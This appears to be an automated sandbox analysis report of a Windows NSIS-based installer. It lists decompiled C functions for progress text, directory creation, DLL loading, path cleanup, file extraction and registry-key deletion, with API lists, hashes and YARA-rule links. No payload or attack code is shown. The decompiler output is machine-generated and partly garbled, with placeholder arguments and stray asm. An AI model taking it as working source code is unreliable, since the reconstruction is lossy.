						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















              0x00404eb9
              0x00404ec5
              0x00404ec8
              0x00404ece
              0x00404eda
              0x00404edd
              0x00404ee0
              0x00404ee6
              0x00404ee6
              0x00404eec
              0x00404ef4
              0x00404ef7
              0x00404f14
              0x00404f18
              0x00404f21
              0x00404f21
              0x00404f2b
              0x00404f34
              0x00404f40
              0x00404f47
              0x00404f4b
              0x00404f4e
              0x00404f61
              0x00404f6f
              0x00404f6f
              0x00404f73
              0x00404f75
              0x00404f78
              0x00000000
              0x00404f78
              0x00404ef9
              0x00404f01
              0x00404f09
              0x00404f0f
              0x00000000
              0x00404f0f
              0x00404f09
              0x00404ef7
              0x00404f82

              APIs
              • lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
              • lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
              • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
              • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
              • SendMessageA.USER32 ref: 00404F47
              • SendMessageA.USER32 ref: 00404F61
              • SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID:
              • API String ID: 2531174081-0
              • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
              • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404790
              0x0040479d
              0x004047a3
              0x004047e1
              0x004047e1
              0x004047f0
              0x004047f7
              0x00000000
              0x004047f9
              0x004047a5
              0x004047b4
              0x004047bc
              0x004047bf
              0x004047d1
              0x004047d7
              0x004047de
              0x00000000
              0x004047de
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
              • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40;
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






              0x00402b7b
              0x00402b89
              0x00402b8f
              0x00402b8f
              0x00402b9d
              0x00402b9f
              0x00402ba5
              0x00402bac
              0x00402bae
              0x00402bae
              0x00402bc4
              0x00402bd4
              0x00402be6
              0x00402be6
              0x00402bee

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
              • MulDiv.KERNEL32 ref: 00402BB4
              • wsprintfA.USER32 ref: 00402BC4
              • SetWindowTextA.USER32(?,?), ref: 00402BD4
              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
              Strings
              • verifying installer: %d%%, xrefs: 00402BBE
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
              • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405375, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






              0x00405380
              0x00405384
              0x00405387
              0x0040538d
              0x00405391
              0x00405395
              0x0040539d
              0x004053a4
              0x004053aa
              0x004053b1
              0x004053c0
              0x004053c2
              0x00000000
              0x004053c2
              0x004053cc
              0x004053d3
              0x004053e9
              0x00000000
              0x00000000
              0x00000000
              0x004053eb
              0x004053ef

              APIs
              • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004053B8
              • GetLastError.KERNEL32 ref: 004053CC
              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
              • GetLastError.KERNEL32 ref: 004053EB
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: Ls@$\s@
              • API String ID: 3449924974-4089078605
              • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
              • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				return LoadLibraryExA( &_v292, 0, 8);
			}







              0x00405f00
              0x00405f09
              0x00405f0b
              0x00405f0b
              0x00405f0f
              0x00405f21
              0x00405f1b
              0x00405f1b
              0x00405f1b
              0x00405f25
              0x00405f39
              0x00405f54

              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
              • wsprintfA.USER32 ref: 00405F39
              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F4D
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%s.dll$UXTHEME$\
              • API String ID: 2200240437-4240819195
              • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
              • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405E29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x00405e2b
              0x00405e33
              0x00405e47
              0x00405e47
              0x00405e4d
              0x00405e5a
              0x00405e5a
              0x00405e5b
              0x00405e5d
              0x00405e61
              0x00405e63
              0x00405e6c
              0x00405e6e
              0x00405e88
              0x00405e90
              0x00405e90
              0x00405e95
              0x00405e97
              0x00405e99
              0x00405e9d
              0x00405e9e
              0x00405ea1
              0x00405ea9
              0x00405eab
              0x00405eaf
              0x00000000
              0x00000000
              0x00405eb5
              0x00405eba
              0x00000000
              0x00000000
              0x00000000
              0x00405eba
              0x00405ebf

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Char$Next$Prev
              • String ID: *?|<>/":
              • API String ID: 589700163-165019052
              • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
              • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401751, Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, 0x434800)), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, 0x40a040,  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488(0x40a040,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75);
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 8));
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















              0x00401751
              0x00401758
              0x00401761
              0x00401764
              0x00401767
              0x0040176c
              0x00401774
              0x00401790
              0x00401776
              0x00401776
              0x00401777
              0x00401777
              0x00401796
              0x004017a0
              0x004017a0
              0x004017a4
              0x004017a7
              0x004017ac
              0x004017ae
              0x004017b0
              0x004017b5
              0x004017b5
              0x004017c0
              0x004017c0
              0x004017d1
              0x004017d3
              0x004017d3
              0x004017d4
              0x004017d4
              0x004017d7
              0x004017da
              0x004017dd
              0x004017dd
              0x004017e4
              0x004017f3
              0x004017f8
              0x004017fb
              0x004017fe
              0x00000000
              0x00000000
              0x00401800
              0x00401803
              0x0040185d
              0x00401862
              0x004015a8
              0x0040268f
              0x0040268f
              0x004028be
              0x004028c1
              0x004028c1
              0x00000000
              0x00401805
              0x0040180b
              0x00401816
              0x00401823
              0x0040182e
              0x00401844
              0x00401844
              0x00401847
              0x00000000
              0x0040184d
              0x0040184d
              0x0040184e
              0x0040186b
              0x004028c7
              0x004028c7
              0x004028c7
              0x00401850
              0x00401850
              0x00401851
              0x00401492
              0x00402241
              0x00402241
              0x00402241
              0x0040184e
              0x00401847
              0x004028c9
              0x004028cd
              0x004028cd
              0x0040187b
              0x00401880
              0x0040188e
              0x00401893
              0x00401899
              0x0040189d
              0x0040189f
              0x004018a7
              0x004018b3
              0x004018a1
              0x004018a1
              0x004018a5
              0x00000000
              0x00000000
              0x004018a5
              0x004018bc
              0x004018c2
              0x004018c4
              0x00000000
              0x004018ca
              0x004018ca
              0x004018cd
              0x004018e5
              0x004018cf
              0x004018d2
              0x004018db
              0x004018db
              0x004018ea
              0x004018ef
              0x0040223c
              0x00000000
              0x0040223c
              0x00000000

              APIs
              • lstrcatA.KERNEL32(00000000,00000000,00409C40,00434800,00000000,00000000,00000031), ref: 00401790
              • CompareFileTime.KERNEL32(-00000014,?,00409C40,00409C40,00000000,00000000,00409C40,00434800,00000000,00000000,00000031), ref: 004017BA
                • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,0042E420,NSIS Error), ref: 00405BD4
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID:
              • API String ID: 1941528284-0
              • Opcode ID: 870905d4944f23dd78321023e111c3e0b55a0fecf5618fac61138b28aecf7b02
              • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
              • Opcode Fuzzy Hash: 870905d4944f23dd78321023e111c3e0b55a0fecf5618fac61138b28aecf7b02
              • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42ecd0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A69(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						if( *0x42ecd0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}








              0x00402a8a
              0x00402a92
              0x00402aba
              0x00402aa4
              0x00402af4
              0x00402afa
              0x00000000
              0x00402afc
              0x00402ab8
              0x00000000
              0x00000000
              0x00402ab8
              0x00402acf
              0x00402ad7
              0x00402ade
              0x00402b0a
              0x00000000
              0x00000000
              0x00402b12
              0x00402b1a
              0x00000000
              0x00000000
              0x00000000
              0x00402b1a
              0x00000000
              0x00402aed
              0x00402b01

              APIs
              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
              • RegCloseKey.ADVAPI32(?), ref: 00402ACF
              • RegCloseKey.ADVAPI32(?), ref: 00402AF4
              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Close$DeleteEnumOpen
              • String ID:
              • API String ID: 1912718029-0
              • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
              • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







              0x00401ce8
              0x00401cef
              0x00401d1e
              0x00401d26
              0x00401d2d
              0x00401d2d
              0x004028c1
              0x004028cd

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 020452eb3921661a00a7f1dec221df2f45b9b93871aa410a8c2cf6622bf1c573
              • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
              • Opcode Fuzzy Hash: 020452eb3921661a00a7f1dec221df2f45b9b93871aa410a8c2cf6622bf1c573
              • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
